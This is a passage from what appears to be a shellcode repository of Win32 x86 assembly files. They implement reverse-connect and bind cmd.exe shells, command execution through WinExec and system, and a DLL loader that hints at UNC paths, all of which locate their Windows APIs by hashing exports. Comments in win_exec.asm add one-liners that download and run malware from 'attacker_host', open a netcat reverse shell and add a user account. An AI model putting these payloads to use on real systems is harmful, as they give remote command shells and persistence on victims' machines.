| hconnect EQU ebp+20 59 | 60 | HASH_CONSTANT EQU 7 61 | 62 | ; macro for generating 16-bit api hashes 63 | hashapi macro szApi 64 | local dwHash 65 | dwHash = 0 66 | 67 | forc x, 68 | dwHash = dwHash + "&x" 69 | dwHash = (dwHash shl HASH_CONSTANT) or (dwHash shr (32-HASH_CONSTANT)) 70 | endm 71 | dwHash = dwHash and 0ffffh 72 | dw dwHash 73 | endm 74 | 75 | assume fs:nothing 76 | 77 | main: 78 | mov eax, end_code-entry_point 79 | sub esp, 200h 80 | push esp 81 | push 02h 82 | call WSAStartup ; just here for testing. 83 | add esp, 200h 84 | ;--------------------- 85 | ;####################################################################### 86 | 87 | entry_point: 88 | add esp, -20 ; create 20 byte stack frame 89 | 90 | mov edi, esp ; edi + ebp will be pointers to api 91 | mov ebp, esp 92 | add ebp, -4 93 | ; get position in memory 94 | push 0c356565eh ; pop esi/push esi/push esi/ret 95 | mov eax, esp 96 | call eax 97 | mem_position: 98 | inc byte ptr [esi + (pws32End - mem_position)] ; nullify byte 99 | lea esi, [esi + (hashed_api - mem_position)] 100 | jmp getk32base 101 | hashed_api: 102 | hashapi 103 | hashapi 104 | hashapi 105 | 106 | db "ws2_32",0ffh,0ffh 107 | pws32End EQU $-2 108 | 109 | hashapi 110 | hashapi 111 | getk32base: 112 | push 30h 113 | pop ecx 114 | mov eax, fs:[ecx] 115 | mov eax, [eax + 0ch] 116 | mov eax, [eax + 1ch] 117 | mov eax, [eax] 118 | mov ebx, [eax + 08h] 119 | ;--------------------- 120 | mov cl, 03h 121 | get_apis: 122 | pushad 123 | movzx eax, word ptr [ebx + 3ch] 124 | mov esi, [eax + ebx + 78h] 125 | lea esi, [ebx + esi + 1ch] 126 | mov cl, 03h 127 | load_rva: 128 | lodsd 129 | add eax, ebx 130 | push eax 131 | loop load_rva 132 | pop ebp 133 | pop edi 134 | load_index: 135 | mov esi, [edi + 4 * ecx] 136 | add esi, ebx 137 | xor eax, eax 138 | cdq 139 | hash_export: 140 | lodsb 141 | add edx, eax 142 | rol edx, HASH_CONSTANT 143 | dec eax 144 | jns hash_export 145 | ror edx, HASH_CONSTANT 146 | inc ecx 147 | mov esi, [esp + 08] 148 | lodsd 149 | cmp ax, dx 150 | jne load_index 151 | ;----------------- 152 | dec ecx 153 | pop esi 154 | xchg eax, ebp 155 | movzx edx, word ptr [eax + 2 * ecx] 156 | add ebx, dword ptr [esi + 4 * edx] 157 | mov [esp + 28], ebx 158 | popad 159 | inc esi 160 | inc esi 161 | stosd 162 | loop get_apis 163 | 164 | push esi 165 | call dword ptr [hLoadLibraryA] 166 | xchg eax, ebx 167 | lodsd 168 | lodsd 169 | ;------------------------------ 170 | push 2 171 | pop ecx 172 | dec edx 173 | jnz get_apis 174 | 175 | push ebx ; 0 176 | push ebx 177 | push ebx 178 | push ebx ; IPPROTO_IP 179 | push 1 ; SOCK_STREAM 180 | push ecx ; AF_INET 181 | call dword ptr [hWSASocketA] 182 | xchg eax, ebx 183 | 184 | push HOST_ADDRESS ; 00100007fh ; 127.0.0.1 / NULL bytes here!!! 185 | push 0697a0102h ; 31337,AF_INET 186 | mov edx, esp 187 | dec byte ptr [esp + 1] ; nullify byte 188 | 189 | push 16 ; sizeof sockaddr_in 190 | push edx ; *sockaddr_in 191 | push ebx ; handle of socket 192 | call dword ptr [hconnect] 193 | 194 | push 0ff646d63h ; 'dmc' / "cmd",0ffh 195 | mov edx, esp 196 | inc byte ptr [edx + 3] ; nullify byte 197 | 198 | push eax ; PROCESS_INFORMATION 199 | push eax 200 | push eax 201 | push eax 202 | mov esi, esp 203 | ;------------- ; STARTUPINFO 204 | push ebx ; hStdError / handle of socket 205 | push ebx ; hStdInput 206 | push ebx ; hStdOutput 207 | ;-------- 208 | push eax 209 | push eax 210 | 211 | push ax 212 | pushw 0101h ;db 66h,68h,01h,01h ; 16-bit push 0101h 213 | ;--------- 214 | push 11 215 | pop ecx 216 | push_stinfo: 217 | push eax 218 | loop push_stinfo 219 | mov ecx, esp 220 | 221 | push esi ;offset lpProcessInformation 222 | push ecx 223 | push eax 224 | push eax 225 | push eax 226 | push 1 ;TRUE 227 | push eax 228 | push eax 229 | push edx ;offset szCmd 230 | push eax 231 | call dword ptr [hCreateProcessA] 232 | 233 | push -1 ; INFINITE 234 | lodsd 235 | push eax ; process handle 236 | call dword ptr [hWaitForSingleObject] 237 | end_code: 238 | push 0 239 | call ExitProcess ; here for test, and because Win2k/XP crash with no API imports in PE file. 240 | end main 241 | -------------------------------------------------------------------------------- /old/rev_pipes.asm: -------------------------------------------------------------------------------- 1 | comment ~ 2 | 3 | Reverse connect to localhost on port 31337 using PIPES as I/O to CMD.EXE. 4 | 5 | Size -> about 357 bytes 6 | 7 | You can assemble with instructions below. 8 | Its a bit lame, but you must terminate this with CTRL-C 9 | 10 | TASM 11 | implib -c -i -o -f import32.lib %SYSTEMROOT%\System32\ws2_32.dll 12 | tasm32 /dTASM /ml rev_pipes.asm 13 | tlink32 /Tpe /ap /x rev_pipes,,,import32.lib 14 | 15 | MASM 16 | ml /DMASM /Cp /c /coff /I c:\masm32\include rev_pipes.asm 17 | link /SUBSYSTEM:CONSOLE /LIBPATH:c:\masm32\lib rev_pipes.obj 18 | 19 | ~ 20 | .586 21 | .model flat, stdcall 22 | 23 | IFDEF MASM 24 | include 25 | .data 26 | pad db 0 27 | .code 28 | ENDIF 29 | 30 | IFDEF TASM 31 | extrn WSAStartup :proc 32 | .code 33 | ret 34 | .data 35 | ENDIF 36 | 37 | HASH_CONSTANT EQU 7 38 | 39 | ; macro for generating 16-bit api hashes 40 | hashapi macro szApi 41 | local dwHash 42 | dwHash = 0 43 | 44 | forc x, 45 | dwHash = dwHash + "&x" 46 | dwHash = (dwHash shl HASH_CONSTANT) or (dwHash shr (32-HASH_CONSTANT)) 47 | endm 48 | dwHash = dwHash and 0ffffh 49 | dw dwHash 50 | endm 51 | 52 | assume fs:nothing 53 | main: 54 | mov eax, end_code-ReverseConnect ; size of code in eax 55 | 56 | sub esp, 200h 57 | push esp 58 | push 02h 59 | call WSAStartup 60 | add esp, 200h 61 | 62 | call ReverseConnect 63 | ;================================= all code below is independent of address 64 | 65 | szInputBuffer equ ebp+64 66 | 67 | pipe_out_pread equ ebp+60 68 | pipe_out_pwrite equ ebp+56 69 | pipe_in_pread equ ebp+52 70 | pipe_in_pwrite equ ebp+48 71 | pipes equ ebp+48 72 | 73 | hLoadLibraryA equ ebp-128 74 | hCreatePipe equ ebp-124 75 | hCreateProcess equ ebp-120 76 | hPeekNamedPipe equ ebp-116 77 | hReadFile equ ebp-112 78 | hWriteFile equ ebp-108 79 | hSleep equ ebp-104 80 | 81 | hsocket equ ebp-100 82 | hconnect equ ebp-96 83 | hsend equ ebp-92 84 | hioctlsocket equ ebp-88 85 | hrecv equ ebp-84 86 | 87 | hsock equ ebp-52 88 | dwBytesRead equ ebp-48 89 | pinfo equ ebp-44 90 | 91 | ReverseConnect: 92 | enter 256, 00h ; create 256 byte stack for local variables. 93 | mov edi, ebp ; 94 | add ebp, 127 95 | inc ebp 96 | 97 | push 30h 98 | pop ecx 99 | mov eax, fs:[ecx] 100 | mov eax, [eax + 0ch] 101 | mov esi, [eax + 1ch] 102 | lodsd 103 | mov ebx, [eax + 08h] 104 | 105 | call load_api_hashes 106 | 107 | hashapi 108 | hashapi 109 | hashapi 110 | hashapi 111 | hashapi 112 | hashapi 113 | hashapi 114 | 115 | db "ws2_32",00h 116 | 117 | hashapi 118 | hashapi 119 | hashapi 120 | hashapi 121 | hashapi 122 | 123 | load_api_hashes: 124 | mov cl, 07h ; number of hashes to retrieve first.. 125 | get_apis_loop: 126 | pushad 127 | mov ebp, [esp + 20h] 128 | movzx eax, word ptr [ebx + 3ch] 129 | mov esi, [eax + ebx + 78h] 130 | lea esi, [ebx + esi + 1ch] 131 | lodsd 132 | add eax, ebx 133 | push eax 134 | lodsd 135 | lea edi, [eax + ebx] 136 | lodsd 137 | add eax, ebx 138 | push eax 139 | xor ecx, ecx 140 | load_index: 141 | mov esi, [edi + 4 * ecx] 142 | add esi, ebx 143 | xor eax, eax 144 | cdq 145 | hash_export: 146 | lodsb 147 | add edx, eax 148 | rol edx, HASH_CONSTANT 149 | dec eax 150 | jns hash_export 151 | ror edx, HASH_CONSTANT 152 | inc ecx 153 | cmp dx, word ptr [ebp] 154 | jne load_index 155 | dec ecx 156 | pop eax 157 | pop esi 158 | movzx eax, word ptr [eax + 2 * ecx] 159 | add ebx, dword ptr [esi + 4 * eax] 160 | mov [esp + 28], ebx 161 | popad 162 | add dword ptr [esp], 02h 163 | stosd 164 | loop get_apis_loop 165 | 166 | push dword ptr [esp] 167 | call dword ptr [hLoadLibraryA] 168 | add dword ptr [esp], 07h 169 | push 05h 170 | pop ecx 171 | dec edx 172 | xchg eax, ebx 173 | jnz get_apis_loop 174 | pop eax 175 | 176 | push ebx ; IPPROTO_IP 177 | push 01h ; SOCK_STREAM 178 | push 02h ; AF_INET 179 | call dword ptr [hsocket] 180 | mov [hsock], eax 181 | 182 | push ebx 183 | push ebx 184 | push 00100007fh ; 127.0.0.1 185 | push 0697a0002h ; 31337 186 | mov edx, esp 187 | 188 | push 10h ; sizeof sockaddr_in 189 | push edx ; *sockaddr_in 190 | push eax ; socket 191 | call dword ptr [hconnect] 192 | add esp, 4*4 ; free sockaddr_in structure on stack 193 | 194 | push 01h ; inherit handles = true 195 | push ebx ; no descriptor 196 | push 0ch ; sizeof SECURITY_ATTRIBUTES 197 | mov edi, esp 198 | 199 | lea esi, [pipes] 200 | push esi 201 | clc 202 | create_pipes: ; the trick with carry flag, I saw done by Vecna/29a 203 | pushfd ; in issue 7 of 29a e-zine, nice one sir! 204 | push ebx 205 | push edi 206 | push esi 207 | lodsd 208 | push esi 209 | lodsd 210 | call dword ptr [hCreatePipe] 211 | popfd 212 | cmc 213 | jc create_pipes 214 | pop ecx 215 | add esp, 0ch 216 | 217 | push "dmc" 218 | mov edx, esp 219 | 220 | push dword ptr[ecx] 221 | push dword ptr[ecx] 222 | push dword ptr [pipe_out_pread] 223 | push ebx 224 | push ebx 225 | 226 | inc ah 227 | push eax ; i saw this STARTUPINFO trick in Z0MBiE/29a Shell code generator example 228 | push 11 ; and also in exploit code by Vecna/29a around same time. 229 | pop ecx 230 | push_stinfo: 231 | push ebx 232 | loop push_stinfo 233 | mov eax, esp 234 | 235 | lea ecx, [pinfo] 236 | push ecx 237 | 238 | push eax 239 | push ebx 240 | push ebx 241 | push ebx 242 | push 01h 243 | push ebx 244 | push ebx 245 | push edx 246 | push ebx 247 | call dword ptr [hCreateProcess] 248 | add esp, 48h 249 | cmd_loop: 250 | push ebx 251 | push ebx 252 | lea esi, [dwBytesRead] 253 | push esi 254 | push 64 255 | lea edi, [szInputBuffer] 256 | push edi 257 | push dword ptr[pipe_in_pread] 258 | call dword ptr [hPeekNamedPipe] 259 | 260 | mov ecx, [esi] 261 | jecxz cmd_get_user_input 262 | 263 | push ebx 264 | push ecx 265 | push edi 266 | push dword ptr [hsock] 267 | ;---------------------- 268 | push ebx 269 | push esi 270 | push ecx 271 | push edi 272 | push dword ptr[pipe_in_pread] 273 | call dword ptr [hReadFile] 274 | ;----------------------------- 275 | call dword ptr [hsend] 276 | cmd_get_user_input: 277 | push esi 278 | push 4004667Fh ; FIONREAD 279 | push dword ptr[hsock] 280 | call dword ptr [hioctlsocket] 281 | 282 | mov ecx, [esi] ; anything waiting to be read? 283 | jecxz cmd_sleep 284 | 285 | push ebx 286 | push esi 287 | push ecx 288 | push edi 289 | push dword ptr[pipe_out_pwrite] 290 | ;------------------------------- 291 | push ebx 292 | push ecx 293 | push edi 294 | push dword ptr[hsock] 295 | call dword ptr [hrecv] ; receive infos 296 | ;------------------------------- 297 | call dword ptr [hWriteFile] ; write to cmd.exe 298 | cmd_sleep: 299 | push 10 ; sleep for while, avoid thrashing. 300 | call dword ptr [hSleep] 301 | jmp cmd_loop 302 | end_code: 303 | 304 | end main 305 | -------------------------------------------------------------------------------- /old/sys_exec.asm: -------------------------------------------------------------------------------- 1 | comment ~ 2 | 3 | When run, locate "LoadLibraryA" address in KERNEL32.DLL, load MSVCRT.DLL and locate 4 | address of "system" API, execute command in order to escalate privileges. 5 | 6 | Code is of variable size, depending on command. 7 | Currently at 159 bytes. 8 | 9 | All this does is echo Hello,World! to file hello.txt and open it with notepad. :) 10 | There is no obfuscation routine. 11 | 12 | Code doesn't terminate until the command which is executed ends also. 13 | If you want to run on its own, assemble with MASM or TASM 14 | 15 | TASM: 16 | implib -c -i -o -f import32.lib %SYSTEMROOT%\System32\kernel32.dll 17 | tasm32 /dTASM /ml /m9 sys_exec.asm 18 | tlink32 /Tpe /ap sys_exec,,,import32.lib 19 | 20 | MASM: 21 | ml /DMASM /Cp /c /coff /Ic:\masm32\include sys_exec.asm 22 | link /SUBSYSTEM:CONSOLE /LIBPATH:c:\masm32\lib sys_exec.obj 23 | 24 | ~ 25 | 26 | .586 27 | .model flat, stdcall 28 | 29 | IFDEF MASM 30 | include 31 | .code 32 | ENDIF 33 | 34 | IFDEF TASM 35 | extrn ExitProcess :proc 36 | .code 37 | ret 38 | .data 39 | ENDIF 40 | 41 | HASH_CONSTANT EQU 9 42 | 43 | ; macro for generating 16-bit api hashes 44 | hashapi macro szApi 45 | local dwHash 46 | dwHash = 0 47 | 48 | forc x, 49 | dwHash = dwHash + "&x" 50 | dwHash = (dwHash shl HASH_CONSTANT) or (dwHash shr (32-HASH_CONSTANT)) 51 | endm 52 | dwHash = dwHash and 0ffffh 53 | dw dwHash 54 | endm 55 | 56 | assume fs:NOTHING 57 | main: 58 | mov eax, end_code-entrypoint 59 | entrypoint: 60 | mov eax, fs:[30h] 61 | mov eax, [eax + 0ch] 62 | mov esi, [eax + 1ch] 63 | lodsd 64 | mov eax, [eax + 08h] 65 | ;--------------------- 66 | call load_data 67 | ;=========================================== 68 | hashapi 69 | db "MSVCRT",00h,00h 70 | hashapi 71 | db "echo Hello,World! >hello.txt & notepad hello.txt",00h 72 | ;=========================================== 73 | load_data: 74 | pop ebp 75 | get_one_api: 76 | xchg eax, ebx 77 | movzx eax, word ptr [ebx + 3ch] 78 | mov esi, [eax + ebx + 78h] 79 | lea esi, [ebx + esi + 1ch] 80 | lodsd 81 | add eax, ebx 82 | push eax 83 | lodsd 84 | lea edi, [eax + ebx] 85 | lodsd 86 | add eax, ebx 87 | push eax 88 | xor ecx, ecx 89 | load_index: 90 | mov esi, [edi + 4 * ecx] 91 | add esi, ebx 92 | xor eax, eax 93 | cdq 94 | hash_export: 95 | lodsb 96 | add edx, eax 97 | rol edx, HASH_CONSTANT 98 | dec eax 99 | jns hash_export 100 | ror edx, HASH_CONSTANT 101 | inc ecx 102 | cmp dx, word ptr [ebp] 103 | jne load_index 104 | dec ecx 105 | pop eax 106 | pop esi 107 | movzx eax, word ptr[eax + 2 * ecx] 108 | add ebx, dword ptr[esi + 4 * eax] 109 | inc ebp 110 | inc ebp 111 | push ebp 112 | call ebx 113 | add ebp, 08h 114 | test eax, eax 115 | jnz get_one_api 116 | end_code: 117 | push eax 118 | call ExitProcess 119 | end main 120 | -------------------------------------------------------------------------------- /old/win_exec.asm: -------------------------------------------------------------------------------- 1 | ; Execute command..this example downloads nc.exe (Netcat) and connects to 2 | ; localhost (127.0.0.1) port 2004 executing cmd.exe which is exactly 3 | ; like reverse-callback shell code. 4 | ; 5 | ; Have TFTP server listening with nc.exe in server directory. 6 | ; Check 29A#6 -> Binaries\Z0MBiE\TFTPSERV.ZIP 7 | ; 8 | ; Have netcat listen locally on port 2004. 9 | ; Like: 10 | ; nc -vLp 2004 127.0.0.1 11 | ; you can probably find netcat on packetstorm, use search engine. 12 | ; 13 | ; When code runs, if all goes well, system should connect and download 14 | ; nc.exe from 127.0.0.1 and execute Netcat, which should then connect to 15 | ; 127.0.0.1 finally spawning cmd prompt. 16 | ; 17 | ; software being exploited will probably no doubt crash after execution,so 18 | ; the rest is up to you. 19 | ; You'll notice write of code section..i'm assuming its writeable 20 | ; when in some memory. 21 | ; 22 | ; Size -> 151 bytes 23 | ; 24 | ; nasm -f bin win_exec.asm -o win_exec.bin 25 | ; 26 | ; 27 | ; 28 | bits 32 29 | 30 | section .text 31 | global entry_point 32 | 33 | entry_point: 34 | xor ecx, ecx ; for WinExec 35 | push dword 0c356515eh ; "pop esi/push ecx/push esi/ret" push ecx = first param to WinExec 36 | mov eax, esp 37 | call eax 38 | add esi, byte 9 ; skip 9 bytes of code 39 | push esi ; second part of WinExec parameter 40 | ;inc byte [esi + nCmdLen - 1] 41 | db 0FEh,046h,045h ; NASM Uses 32-bit displacement, when we only want 8 42 | jmp short $+nCmdLen+2 ; but if 3 bytes means no big deal, uncomment before INC BYTE .. 43 | ;===================== ; and remove opcode below it...dont 4get, if cmd line changed, opcode 44 | szCmd: ; needs changing ;) 45 | db "cmd /c tftp -i 127.0.0.1 GET nc.exe nc.exe && nc 127.0.0.1 2004 -ecmd",0ffh 46 | nCmdLen equ $-szCmd 47 | ;===================== 48 | mov cl, 30h 49 | mov eax, [fs:ecx] 50 | mov eax, [eax + 0ch] 51 | mov esi, [eax + 1ch] 52 | lodsd 53 | mov ebx, [eax + 08h] 54 | ;===================== 55 | mov eax, [ebx + 3ch] 56 | mov eax, [ebx + eax + 78h] 57 | lea esi, [ebx + eax + 1ch] 58 | mov cl, 03h 59 | load_rva: 60 | lodsd 61 | add eax, ebx 62 | push eax 63 | loop load_rva 64 | pop edx 65 | pop esi 66 | mov eax, 'EniW' ; WinExec 67 | scan_apis: 68 | mov edi, [esi + 4 * ecx] 69 | add edi, ebx 70 | inc ecx 71 | scasd 72 | jne scan_apis 73 | dec ecx 74 | pop esi 75 | movzx eax, word [edx + 2 * ecx] 76 | add ebx, [esi + 4 * eax] 77 | call ebx 78 | exit_point: 79 | ; ; do something here to avoid crash. 80 | ; other commands you could use are: 81 | ;cmd /c tftp -i attacker_host GET malware.exe && malware.exe ; download & execute file 82 | ;cmd /c tftp -i attacker_host GET nc.exe nc.exe && nc -Lp2004 -ecmd ; bind cmd to port 2004 83 | ;cmd /c net user h4x0r 31337 /add ; add username to SAM database 84 | ; and again of course.. 85 | ;cmd /c tftp -i attacker_host GET nc.exe nc.exe && nc attacker_host 2004 -ecmd ; reverse-connect cmd port 2004 86 | -------------------------------------------------------------------------------- /old/xdll.asm: -------------------------------------------------------------------------------- 1 | comment ~ 2 | 3 | This executes LoadLibraryA specifying "user32" as argument. 4 | Observe the UNC (Universal Naming Convention) hint. 5 | 6 | When a DLL is loaded into memory, it is passed messages from 7 | the operating system, such as DLL_PROCESS_ATTACH & DLL_THREAD_ATTACH 8 | 9 | So, after the operating system loads a DLL into a process, the entry point of the DLL 10 | will be executed. 11 | Upside of this is that the DLL need not be in assembly. 12 | You may use HLL coded DLL, in C/C++..etc 13 | 14 | Size of this code is currently 80 bytes. 15 | 82 with extra jump, Get/SetThreadContext can sort this out from dll loaded into mem. 16 | So, its not needed, except for this example.. 17 | 18 | It doesn't do anything useful at the moment..but 19 | You *could* have a stable reverse-shell, using loader like this under 100 bytes, 20 | providing you have netbios share accessable to system being exploited. 21 | 22 | The idea was suggested by Brett Moore on darklabs dec 03 23 | 24 | TASM arguments. 25 | 26 | implib -c -f -o -i kernel32.lib %SYSTEMROOT%\system32\kernel32.dll 27 | tasm32 /dTASM /ml /m9 xdll.asm 28 | tlink32 /Tpe /aa /x xdll.obj,,,kernel32.lib 29 | 30 | MASM arguments. 31 | 32 | ml /DMASM /Cp /coff /c /Ic:\masm32\include xdll.asm 33 | link /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib /SECTION:.text,W xdll.obj 34 | 35 | ~ 36 | .586 37 | .model flat, stdcall 38 | 39 | IFDEF MASM 40 | include 41 | .code 42 | ENDIF 43 | 44 | IFDEF TASM 45 | extrn ExitProcess :proc 46 | .code 47 | ret 48 | .data 49 | ENDIF 50 | 51 | assume fs:nothing 52 | 53 | main: 54 | mov eax, exit_point-entry_point ; currently 80 bytes + 2 (for jmp at end) 55 | ;================================ 56 | entry_point: 57 | jmp over_code 58 | gdelta: 59 | pop esi 60 | push esi ; LoadLibraryA arguement 61 | inc byte ptr [esi + nUNCLen] ; complete null terminated string 62 | 63 | push 30h 64 | pop ecx 65 | mov eax, fs:[ecx] ; Getting Process Infos - Ratter/29A Issue 6 66 | mov eax, [eax + 0ch] 67 | mov esi, [eax + 1ch] 68 | lodsd 69 | mov ebx, [eax + 08h] 70 | ;===================== 71 | mov cl, 03h 72 | mov eax, [ebx + 3ch] ; optional PE header (this is a word,dword saves space) 73 | mov eax, [ebx + eax + 78h] ; export directory 74 | lea esi, [ebx + eax + 1ch] ; offset API rva 75 | load_rva: 76 | lodsd 77 | add eax, ebx ; rva 2 va 78 | push eax 79 | loop load_rva 80 | pop edx 81 | pop esi 82 | load_index: 83 | mov edi, [esi + 4 * ecx] 84 | inc ecx ; increase index 85 | cmp dword ptr [ebx + edi], 'daoL' ; LoadLibraryA 86 | jne load_index 87 | dec ecx 88 | pop esi 89 | movzx eax, word ptr [edx + 2 * ecx] ; get API ordinal 90 | add ebx, [esi + 4 * eax] ; add api rva to base 91 | call ebx ; call api 92 | ;================================== 93 | jmp exit_point ; not really part of asm code, gotta go somewhere tho, right? 94 | over_code: 95 | call gdelta 96 | szUNC: 97 | ;db "\\HOST\SHARE\DLL",0ffh ; unc hint, change this to your needs. 98 | db "user32",0ffh 99 | nUNCLen equ $-szUNC-1 100 | 101 | exit_point: 102 | push eax 103 | call ExitProcess ; only here for test & because win2k/xp crash with no imports in PE file 104 | 105 | end main 106 | -------------------------------------------------------------------------------- /win32/bind_overlap.asm: -------------------------------------------------------------------------------- 1 | ; 2 | ; The MIT License: 3 | ; 4 | ; Copyright (c) 2004, 2008, 2013 Kevin Devine 5 | ; 6 | ; Permission is hereby granted, free of charge, to any person obtaining a 7 | ; copy of this software and associated documentation files (the "Software"), 8 | ; to deal in the Software without restriction, including without limitation 9 | ; the rights to use, copy, modify, merge, publish, distribute, 10 | ; sublicense, and/or sell copies of the Software, and to permit persons to 11 | ; whom the Software is furnished to do so, subject to the following 12 | ; conditions: 13 | ; 14 | ; The above copyright notice and this permission notice shall be included in 15 | ; all copies or substantial portions of the Software. 16 | ; 17 | ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 22 | ; ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 23 | ; OTHER DEALINGS IN THE SOFTWARE. 24 | ; 25 | .686 26 | .model flat, stdcall 27 | 28 | option casemap:none 29 | 30 | .nolist 31 | .nocref 32 | 33 | WIN32_LEAN_AND_MEAN equ 1 34 | 35 | include windows.inc 36 | include winsock.inc 37 | 38 | .list 39 | .cref 40 | 41 | LOCAL_IP equ 00100007fh ; 127.0.0.1 42 | LOCAL_PORT equ 1234 43 | ROL_CONSTANT equ 7 44 | 45 | mrol macro iNum:req, iBits:req 46 | exitm <((iNum shl iBits) and 0FFFFFFFFh) or (iNum shr (32-iBits))> 47 | endm 48 | 49 | hashapi macro szApi 50 | local dwApi 51 | 52 | dwApi = 0 53 | 54 | forc x, szApi 55 | if '&x' ne '"' 56 | dwApi = mrol((dwApi + '&x'), ROL_CONSTANT) xor '&x' 57 | endif 58 | endm 59 | dwApi = mrol(dwApi, ROL_CONSTANT) 60 | ifdef USE_16 61 | dw (dwApi and 0FFFFh) 62 | else 63 | dd (dwApi and 0FFFFFFFFh) 64 | endif 65 | endm 66 | 67 | PUSHAD_STRUCT struc 68 | _edi dd ? 69 | _esi dd ? 70 | _ebp dd ? 71 | _esp dd ? 72 | _ebx dd ? 73 | _edx dd ? 74 | _ecx dd ? 75 | _eax dd ? 76 | PUSHAD_STRUCT ends 77 | 78 | .data 79 | wsa WSADATA <> 80 | 81 | includelib kernel32.lib 82 | includelib ws2_32.lib 83 | 84 | STACK_SIZE equ sizeof(PROCESS_INFORMATION) \ 85 | + sizeof(STARTUPINFO) \ 86 | + sizeof(sockaddr_in) \ 87 | + 6*4 88 | .code 89 | 90 | entrypoint: 91 | ifdef TEST_CODE 92 | mov eax, code_end - code_start 93 | 94 | push offset wsa 95 | push MAKEWORD(2, 0) 96 | call WSAStartup 97 | 98 | call code_start 99 | 100 | push eax 101 | call ExitProcess 102 | endif 103 | code_start: 104 | jmp load_data 105 | calc_position: 106 | pop esi ; esi has pointer to our hashes 107 | ; load relative address of our API retrieval routine 108 | lea ebp, [esi + (offset get_proc_address - offset data_section)] 109 | 110 | xor eax, eax ; eax = 0 111 | cdq ; edx = 0 112 | mov dl, STACK_SIZE 113 | 114 | sub esp, edx ; first, reserve stack space for api parameters 115 | mov edi, esp ; store stack pointer in edi so we can use stosd instruction 116 | mov ecx, edx ; set size of data to initialize 117 | rep stosb ; zero fill 118 | 119 | push SOCK_STREAM 120 | push AF_INET 121 | call ebp ; WSASocketA 122 | xchg eax, ebx ; save socket 123 | 124 | push LOCAL_IP 125 | push ((LOCAL_PORT and 0FFh) shl 24) or \ 126 | (((LOCAL_PORT and 0FF00h) shr 8) shl 16) + AF_INET 127 | mov eax, esp ; sockaddr_in 128 | 129 | push sizeof(sockaddr_in) 130 | push eax ; &sin 131 | push ebx ; s 132 | call ebp ; bind 133 | 134 | add esp, sizeof(sockaddr_in)+2*4 ; free stack space 135 | 136 | push 1 ; accept 1 connection 137 | push ebx 138 | call ebp ; listen 139 | 140 | push ebx 141 | call ebp ; accept 142 | 143 | push ebx ; parameter to closesocket 144 | 145 | lea ebx, [edi - ( sizeof(PROCESS_INFORMATION) + sizeof(STARTUPINFO) )] 146 | lea edi, [ebx][STARTUPINFO.hStdInput] 147 | inc dword ptr[ebx][STARTUPINFO.dwFlags+1] 148 | 149 | stosd ; si.hStdInput 150 | stosd ; si.hStdOutput 151 | stosd ; si.hStdError 152 | 153 | cdq 154 | push edi ; &pi 155 | push ebx ; &si 156 | 157 | push edx 158 | push edx 159 | push edx 160 | push eax ; TRUE 161 | push edx ; 0 162 | push edx ; 0 163 | inc byte ptr[esi+3] 164 | push esi ; "cmd",0 165 | lodsd ; skip string 166 | push edx ; 0 167 | call ebp ; CreateProcessA 168 | 169 | push INFINITE ; INFINITE 170 | push dword ptr[edi][PROCESS_INFORMATION.hProcess] 171 | call ebp ; WaitForSingleObject 172 | call ebp ; closesocket 173 | add esp, sizeof(PROCESS_INFORMATION) + sizeof(STARTUPINFO) ; free stack space 174 | ret 175 | 176 | load_data: 177 | call calc_position 178 | ; not really data section as we're in same segment 179 | data_section label dword 180 | hashapi "WSASocketA" 181 | hashapi "bind" 182 | hashapi "listen" 183 | hashapi "accept" 184 | db "c", "m", "d", 0FFh 185 | hashapi "CreateProcessA" 186 | hashapi "WaitForSingleObject" 187 | hashapi "closesocket" 188 | 189 | get_proc_address proc near 190 | assume fs:nothing 191 | ifdef USE_16 192 | lodsw 193 | else 194 | lodsd 195 | endif 196 | pushad 197 | push 30h 198 | pop esi 199 | lods dword ptr fs:[esi] 200 | mov eax, [eax+0Ch] 201 | mov esi, [eax+1Ch] 202 | load_dll: 203 | mov ebp, [esi+08h] 204 | lodsd 205 | push eax 206 | 207 | mov eax, [ebp+3Ch] ; IMAGE_DOS_HEADER.e_lfanew 208 | mov eax, [ebp+eax+78h] ; IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress 209 | lea esi, [ebp+eax+18h] ; IMAGE_EXPORT_DIRECTORY.NumberOfNames 210 | lodsd 211 | xchg eax, ecx 212 | jecxz load_dll 213 | 214 | lodsd ; IMAGE_EXPORT_DIRECTORY.AddressOfFunctions 215 | add eax, ebp 216 | push eax 217 | 218 | lodsd ; IMAGE_EXPORT_DIRECTORY.AddressOfNames 219 | lea edi, [ebp+eax] 220 | 221 | lodsd ; IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals 222 | lea ebx, [ebp+eax] 223 | load_api: 224 | mov esi, [edi+4*ecx-4] 225 | add esi, ebp 226 | xor eax, eax 227 | cdq 228 | hash_api: 229 | lodsb 230 | add edx, eax 231 | rol edx, ROL_CONSTANT 232 | xor edx, eax 233 | dec eax 234 | jns hash_api 235 | 236 | ifdef USE_16 237 | mov eax, dword ptr[esp+8][PUSHAD_STRUCT._eax] 238 | cmp dx, ax 239 | else 240 | cmp edx, dword ptr[esp+8][PUSHAD_STRUCT._eax] 241 | endif 242 | loopne load_api 243 | pop eax 244 | pop esi 245 | jne load_dll 246 | 247 | movzx edx, word ptr [ebx+2*ecx] 248 | add ebp, [eax+4*edx] 249 | mov [esp][PUSHAD_STRUCT._eax], ebp 250 | popad 251 | jmp eax 252 | get_proc_address endp 253 | 254 | code_end label dword 255 | 256 | end entrypoint 257 | -------------------------------------------------------------------------------- /win32/exec.asm: -------------------------------------------------------------------------------- 1 | ; The MIT License: 2 | ; 3 | ; Copyright (c) 2004, 2013 Kevin Devine 4 | ; 5 | ; Permission is hereby granted, free of charge, to any person obtaining a 6 | ; copy of this software and associated documentation files (the "Software"), 7 | ; to deal in the Software without restriction, including without limitation 8 | ; the rights to use, copy, modify, merge, publish, distribute, 9 | ; sublicense, and/or sell copies of the Software, and to permit persons to 10 | 